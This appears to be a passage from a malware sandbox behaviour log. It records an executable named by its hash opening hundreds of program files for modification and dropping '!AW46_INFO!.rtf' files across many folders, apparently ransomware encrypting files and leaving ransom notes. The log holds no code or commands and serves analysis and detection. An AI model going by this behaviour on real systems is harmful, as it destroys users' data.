created C:\Program Files\VideoLAN\VLC\hrtfs\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ta.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_200_percent.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoDev.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\youtube.crx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\DismountClose.wps 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lv.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program 